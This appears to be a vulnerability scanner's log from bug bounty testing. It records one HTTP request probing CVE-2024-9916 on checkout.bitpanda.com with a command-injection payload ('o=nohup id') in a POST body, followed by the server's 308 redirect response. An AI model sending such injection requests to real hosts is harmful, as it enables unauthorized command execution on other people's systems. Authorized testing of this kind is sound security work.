[CVE-2024-9916] Dumped HTTP request for http://checkout.bitpanda.com/app/modules/ut-cac/admin/cli.php


POST /app/modules/ut-cac/admin/cli.php HTTP/1.1
Host: checkout.bitpanda.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 10
Content-Type: application/x-www-form-urlencoded
Origin: http://checkout.bitpanda.com
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

o=nohup id
[CVE-2024-9916] Dumped HTTP response http://checkout.bitpanda.com/app/modules/ut-cac/admin/cli.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:46 GMT
Location: https://checkout.bitpanda.com/app/modules/ut-cac/admin/cli.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

